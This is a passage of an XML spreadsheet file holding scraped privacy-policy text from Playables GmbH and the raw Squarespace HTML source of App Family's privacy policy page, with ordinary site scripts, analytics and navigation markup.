    <t>These may include the right (i) to request access and obtain a copy of your personal information, (ii) to request rectification or erasure; (iii) to restrict the processing of your personal information; and (iv) if applicable, to data portability. In certain circumstances, you may also have the right to object to the processing of your personal information. To make such a request, please use the [contact details](#contact) provided below.</t>
  </si>
  <si>
    <t xml:space="preserve">We will consider and act upon any request in accordance with applicable data protection laws.   
 If we are relying on your consent to process your personal information, you have the right to withdraw your consent at any time. Please note however that this will not affect the lawfulness of the processing before its withdrawal.  
</t>
  </si>
  <si>
    <t>If you are resident in the European Economic Area and you believe we are unlawfully processing your personal information, you also have the right to complain to your local data protection supervisory authority. You can find their contact details here: &lt;http://ec.europa.eu/justice/data-protection/bodies/authorities/index_en.htm&gt;  
## 9. CONTROLS FOR DO-NOT-TRACK FEATURES
Most web browsers and some mobile operating systems and mobile applications include a Do-Not-Track ("DNT") feature or setting you can activate to signal your privacy preference not to have data about your online browsing activities monitored and collected. No uniform technology standard for recognizing and implementing DNT signals has been finalized.</t>
  </si>
  <si>
    <t>As such, we do not currently respond to DNT browser signals or any other mechanism that automatically communicates your choice not to be tracked online. If a standard for online tracking is adopted that we must follow in the future, we will inform you about that practice in a revised version of this Privacy Policy.
## 10. DO CALIFORNIA RESIDENTS HAVE SPECIFIC PRIVACY RIGHTS?
California Civil Code Section 1798.83, also known as the "Shine The Light" law, permits our users who are California residents to request and obtain from us, once a year and free of charge, information about categories of personal information (if any) we disclosed to third parties for direct marketing purposes and the names and addresses of all third parties with which we shared personal information in the immediately preceding calendar year.</t>
  </si>
  <si>
    <t>If you are a California resident and would like to make such a request, please submit your request in writing to us using the contact information provided below. 
 If you are under 18 years of age, reside in California, and have a registered account with the Apps, you have the right to request removal of unwanted data that you publicly post on the Apps. To request removal of such data, please contact us using the contact information provided below, and include the email address associated with your account and a statement that you reside in California.</t>
  </si>
  <si>
    <t>We will make sure the data is not publicly displayed on the Apps, but please be aware that the data may not be completely or comprehensively removed from our systems.
## 11. DO WE MAKE UPDATES TO THIS POLICY?
 We may update this privacy policy from time to time.</t>
  </si>
  <si>
    <t xml:space="preserve">The updated version will be indicated by an updated "Revised" date and the updated version will be effective as soon as it is accessible. If we make material changes to this privacy policy, we may notify you either by prominently posting a notice of such changes or by directly sending you a notification. We encourage you to review this privacy policy frequently to be informed of how we are protecting your information.
</t>
  </si>
  <si>
    <t>## 12. HOW CAN YOU CONTACT US ABOUT THIS POLICY?
 If you have questions or comments about this policy, you may contact our Data Protection Officer (DPO), Paul Kaiser, by email at mail@playables.net, or by post to:
Playables GmbH  
Paul Kaiser  
Hermetschloostrasse 70  
Zürich, 8048  
Switzerland
&lt;/div&gt;
&lt;script type="text/javascript"&gt;
var converter = new showdown.</t>
  </si>
  <si>
    <t>Converter();
let markdownText = document.querySelectorAll(".markdown-convert");
for (var i = 0; i &lt; markdownText.length; i++) {
	markdownText[i].classList.remove("markdown-convert");
	markdownText[i].classList.add("markdown-converted");
  	 markdownText[i].innerHTML = converter.makeHtml(markdownText[i].innerHTML);
}
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US"  class="touch-styles"&gt;
  &lt;head&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;!-- This is Squarespace. --&gt;&lt;!-- per-haglund --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;Privacy Policy &amp;mdash; App Family&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/562614e0e4b04ac58dc994d1/1556608646819-6MF9FYLZC8UTY1RRRS3N/favicon.ico"/&gt;
&lt;link rel="canonical" href="https://www.appfamilygames.com/privacy-policy"/&gt;
&lt;meta property="og:site_name" content="App Family"/&gt;
&lt;meta property="og:title" content="Privacy Policy &amp;mdash; App Family"/&gt;
&lt;meta property="og:url" content="https://www.appfamilygames.com/privacy-policy"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta itemprop="name" content="Privacy Policy — App Family"/&gt;
&lt;meta itemprop="url" content="https://www.appfamilygames.com/privacy-policy"/&gt;
&lt;meta name="twitter:title" content="Privacy Policy — App Family"/&gt;
 &lt;meta name="twitter:url" content="https://www.appfamilygames.com/privacy-policy"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="description" content="" /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/QQMUH94OOuuyFeNNtPlw6QvQ0RDZASL2LE-vu06J_7IfenI2fFHN4UJLFRbh52jhWD9hwRjUFe93ZQsKw2syjD9tZewo5QsqwsTliaiaOcB3SeZydA8CpAiydAmDOcFzdPUySYgcjAuTdY81jAu8SkoRdhXCdeNRjAUGdaFXOYg8SKuGjAiCiAoqO1FUiABkZWF3jAF8OcFzdP37O1g8SKuGjAiCiAoqO1FUiABkZWF3jAF8OcFzdPJwSY4zpe8ljPu0daZyJy4yZeNKZPu1jW4ydAN0Zfu3Scv7fbKnMsMMeMI6MKG4fH3gIMMjfkMfH6qJtKGbMg62JMJ7fbRRHyMMeMX6MKG4fHvgIMMjgfMfH6qJCMIbMg65JMJ7f6K3UMIbMg6BJMJ7f6KUUMIbMg6VJMJ7fbKlMsMMeMj6MKG4fHtgIMMjIfMfH6qJK3IbMg6YJMJ7fbKwMsMMegI6MKG4fHqgIMMjffMfH6qJ76IbMg6PJMJ7fbK4MsMMeMq6MKG4fJGgIMMjIkMfH6qJvDbbMs6IJMJ7fbRkFgMgeMt6MKG4fVbXIMIjgKMfH6qJNQbbMs6bJMJ7fbR3FgMgeMS6MKG4fVIXIMIjIPMfqMeVCvpUgb.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-81c5d2656e0850fced7e0-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-81c5d2656e0850fced7e0-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-10333fece8f52d23629e3-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-10333fece8f52d23629e3-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window. Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-cfb9ca391e5434cccb495-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-d61ee22e7c56cbfe6bf6f-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-a03ec6aa3252c6c79a13c-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-3a18a40d3a28179a79fe4-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-97452adf98b259487f44f-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-dd96b4be33459afc5aed8-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-57c1789de4c416ce9982b-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-4d72177710b16966fd304-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-af841a4de517d1960ffe3-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-a1067e56130bfa7beb364-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-7bf44765a935060ae0761-min.en-US.js"}},"pageType":2,"website":{"id":"562614e0e4b04ac58dc994d1","identifier":"per-haglund","websiteType":1,"contentModifiedOn":1660914036385,"cloneable":false,"hasBeenCloneable":false,"siteStatus":{},"language":"en-US","timeZone":"Europe/Stockholm","machineTimeZoneOffset":7200000,"timeZoneOffset":7200000,"timeZoneAbbr":"CEST","siteTitle":"App Family","fullSiteTitle":"Privacy Policy \u2014 App Family","siteTagLine":"","siteDescription":"&lt;p&gt;</t>
  </si>
  <si>
    <t>We create beautiful and engaging apps for young children&lt;/p&gt;","location":{"mapZoom":12.0,"mapLat":56.19266349999999,"mapLng":12.559566700000005,"markerLat":59.20794919999999,"markerLng":17.90351469999996,"addressTitle":"App Family AB","addressLine1":"23 M\u00E5nstorpsv\u00E4gen","addressLine2":"H\u00F6gan\u00E4s, Sk\u00E5ne l\u00E4n, 263 32","addressCountry":"Sweden"},"logoImageId":"5cc7f55ce6c4d100018d32b0","shareButtonOptions":{"3":true,"7":true,"4":true,"6":true,"2":true,"8":true,"1":true},"logoImageUrl":"//images.squarespace-cdn.com/content/v1/562614e0e4b04ac58dc994d1/1556608349131-8ASDK0FKUSNJE2DOUD06/Round_icon_logo_small.png","authenticUrl":"https://www.appfamilygames.com","internalUrl":"https://per-haglund.squarespace.com","baseUrl":"https://www.appfamilygames.com","primaryDomain":"www.appfamilygames.com","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":2,"userId":"10153046163107511","screenname":"Per Haglund","addedOn":1446109217558,"profileUrl":"https://www.facebook.com/appfamily","iconUrl":"http://graph.facebook.com/10153046163107511/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook"},{"serviceId":20,"userId":"per.haglund@appfamily.se","screenname":"per.haglund@appfamily.se","addedOn":1446108855292,"profileUrl":"mailto:per.haglund@appfamily.se","iconEnabled":true,"serviceName":"email"},{"serviceId":11,"userId":"UCzWJ01xI9I6uzVefwNk0TzQ","screenname":"App Family - Adorable games for kids!","addedOn":1446108903452,"profileUrl":"https://www.youtube.com/user/AppFamilyAB","iconUrl":"https://yt3.ggpht.com/-cpE5UGnq5Hg/AAAAAAAAAAI/AAAAAAAAAAA/UVp1E0iHktI/s88-c-k-no/photo.jpg","iconEnabled":true,"serviceName":"youtube"},{"serviceId":28,"userName":"Google Play","screenname":"Google Play","addedOn":1446109042723,"profileUrl":"https://play.google.com/store/apps/dev?id=8230212300039227114","iconEnabled":true,"serviceName":"googleplay"},{"serviceId":27,"userName":"App Store","screenname":"App Store","addedOn":1446109079043,"profileUrl":"https://itunes.apple.com/us/developer/app-family-ab/id491507062","iconEnabled":true,"serviceName":"itunes"},{"serviceId":32,"screenname":"Medium","addedOn":1446109002552,"profileUrl":"https://medium.com/@perhaglund/","iconEnabled":true,"serviceName":"medium"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"screenshotId":"9f37b6b4","showOwnerLogin":false},"websiteSettings":{"id":"562614e0e4b04ac58dc994d3","websiteId":"562614e0e4b04ac58dc994d1","type":"Business","subjects":[],"country":"SE","state":"AB","simpleLikingEnabled":true,"mobileInfoBarSettings":{"style":3,"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"popupOverlaySettings":{"style":1,"enabledPages":[]},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"contactPhoneNumber":"+46 707 777330","storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["USD","CAD","GBP","AUD","EUR","CHF"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":2,"orderConfirmationInjectCode":"","showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":false,"enableMailingListOptInByDefault":true,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":true,"isRestrictiveCookiePolicyEnabled":true,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"&lt;p class=\"\" style=\"white-space:pre-wrap;\"&gt;By using this website, you agree to our use of cookies. We use cookies to help our website run effectively.&lt;/p&gt;","cookieBannerTheme":"DARK","cookieBannerVariant":"BAR","cookieBannerPosition":"BOTTOM","cookieBannerCtaVariant":"BUTTON","cookieBannerCtaText":"Accept","cookieBannerAcceptType":"OPT_IN_AND_OUT","cookieBannerOptOutCtaText":"Decline"},"websiteCloneable":false,"collection":{"title":"Privacy Policy","id":"5631dde8e4b056714fc019d0","fullUrl":"/privacy-policy","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","banner-slideshow-controls":"Arrows","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Grid","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"280px","gridSpacing":"10px","logoContainerWidth":"140px","product-gallery-auto-crop":"false","product-image-auto-crop":"true","siteTitleContainerWidth":"220px","tweak-v1-related-products-title-spacing":"50px"},"templateId":"52a74dafe4b073a80cd253c5","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/52a74d9ae4b0253945d2aee9/1043/scripts/","betaFeatureFlags":["campaigns_new_subscriber_search","fluid_engine_clean_up_grid_contextual_change","order_status_page_checkout_landing_enabled","accounting_orders_sync","commerce_site_visitor_metrics","commerce_restock_notifications","crm_remove_subscriber","commerce_order_status_access","campaigns_discount_section_in_automations","commerce_clearpay","campaigns_asset_picker","campaigns_discount_section_in_blasts","crm_waitlist_enforce_recaptcha_v3_enterprise","background_art_onboarding","customer_account_creation_recaptcha","multilingual_transactional_emails","block_annotations_revamp","campaigns_new_image_layout_picker","campaigns_content_editing_survey","marketing_landing_page","is_feature_gate_refresh_enabled","crm_enforce_recaptcha_v3_enterprise","campaigns_thumbnail_layout","commerce_etsy_product_import","scripts_defer","commerce_etsy_shipping_import","member_areas_schedule_interview","crm_enable_recaptcha_v3_enterprise","crm_default_newsletter_block_to_campaigns","member_areas_provisioning_service","site_user_email_change","campaigns_import_discounts","send_local_pickup_ready_email","viewer-role-contributor-invites","crm_retention_segment","campaigns_global_uc_ab","member_areas_spanish_interviews","fluid_engine","campaigns_show_featured_templates","nested_categories_migration_enabled","customer_accounts_email_verification"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-course-collection"],"impersonatedSession":false,"tzData":{"zones":[[60,"EU","CE%sT",null]],"rules":{"EU":[[1981,"max",null,"Mar","lastSun","1:00u","1:00","S"],[1996,"max",null,"Oct","lastSun","1:00u","0",null]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"Europe/Stockholm","name":"Central European Time"}}};&lt;/script&gt;&lt;script&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://www.appfamilygames.com","name":"App Family","description":"&lt;p&gt; We create beautiful and engaging apps for young children&lt;/p&gt;","image":"//images.squarespace-cdn.com/content/v1/562614e0e4b04ac58dc994d1/1556608349131-8ASDK0FKUSNJE2DOUD06/Round_icon_logo_small.png","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"legalName":"App Family AB","address":"23 M\u00E5nstorpsv\u00E4gen\nH\u00F6gan\u00E4s, Sk\u00E5ne l\u00E4n, 263 32\nSweden","email":"hello@appfamily.se","telephone":"+46 707 777330","sameAs":["https://www.facebook.com/appfamily","mailto:per.haglund@appfamily.se","https://www.youtube.com/user/AppFamilyAB","https://play.google.com/store/apps/dev?id=8230212300039227114","https://itunes.apple.com/us/developer/app-family-ab/id491507062","https://medium.com/@perhaglund/"],"@context":"http://schema.org","@type":"Organization"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"address":"23 M\u00E5nstorpsv\u00E4gen\nH\u00F6gan\u00E4s, Sk\u00E5ne l\u00E4n, 263 32\nSweden","image":"https://static1.squarespace.com/static/562614e0e4b04ac58dc994d1/t/5cc7f55ce6c4d100018d32b0/1660914036385/","name":"App Family AB","@context":"http://schema.org","@type":"LocalBusiness"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/562614e0e4b04ac58dc994d1/42/52a74dafe4b073a80cd253c5/562614e0e4b04ac58dc994d7/1043/site.css"/&gt;&lt;meta name="google-site-verification" content="D-cckx_6iGQCqVilUHf1cl56Ok4EplHMSpwwMdDz4gA" /&gt;
&lt;script type="application/ld+json"&gt;
{
  "@context" : "http://schema.org",
  "@type" : "WebSite",
  "name" : "App Family Games",
  "alternateName" : "App Family",
  "url" : "http://appfamilygames.com"
}
&lt;/script&gt;&lt;script&gt;Static.</t>
  </si>
  <si>
    <t>COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-29724671-1"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('set', 'developer_id.dZjQwMz', true);gtag('config', 'UA-29724671-1');&lt;/script&gt;&lt;!-- End of Squarespace Headers --&gt;
    &lt;script&gt;/* Must be below squarespace-headers */(function(){var e='ontouchstart'in</t>
  </si>
  <si>
    <t xml:space="preserve">window||navigator.msMaxTouchPoints;var t=document.documentElement;if(!e&amp;&amp;t){t.className=t.className.replace(/touch-styles/,'')}})()
     &lt;/script&gt;
  &lt;/head&gt;
  &lt;body id="collection-5631dde8e4b056714fc019d0" class="transparent-header enable-nav-button nav-button-style-outline nav-button-corner-style-pill banner-button-style-solid banner-button-corner-style-pill banner-slideshow-controls-arrows meta-priority-date  hide-entry-author hide-list-entry-footer    hide-blog-sidebar center-navigation--info    event-show-past-events event-thumbnails event-thumbnail-size-32-standard event-date-label  event-list-show-cats event-list-date event-list-time event-list-address   event-icalgcal-links  event-excerpts      gallery-design-grid aspect-ratio-auto lightbox-style-light gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop   product-list-titles-under product-list-alignment-center product-item-size-11-square product-image-auto-crop product-gallery-size-11-square  show-product-price show-product-item-nav product-social-sharing tweak-v1-related-products-image-aspect-ratio-11-square tweak-v1-related-products-details-alignment-center newsletter-style-dark hide-opentable-icons opentable-style-dark small-button-style-solid small-button-shape-square medium-button-style-solid medium-button-shape-square large-button-style-solid large-button-shape-square image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-solid button-corner-style-square tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-5631dde8e4b056714fc019d0 collection-type-page collection-layout-default mobile-style-available "&gt;
    &lt;a href="#" class="body-overlay"&gt;&lt;/a&gt;
    &lt;div class="sqs-announcement-bar-dropzone"&gt;&lt;/div&gt;
    &lt;div id="sidecarNav"&gt;
  &lt;div id="mobileNavWrapper" class="nav-wrapper" data-content-field="navigation-mobileNav"&gt;
    &lt;nav id="mobileNavigation"&gt;
            &lt;div class="collection homepage"&gt;
              &lt;a href="/"&gt;
                Home
              &lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="collection"&gt;
              &lt;a href="/games"&gt;
                Games
              &lt;/a&gt;
            &lt;/div&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/educational-apps"&gt;Educational apps&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/edu-overview"&gt;
                  Overview
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/mymemo"&gt;
                  MyMemo guide
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="folder active"&gt;
            &lt;div class="folder-toggle" data-href="/about-us"&gt;About Us&lt;/div&gt;
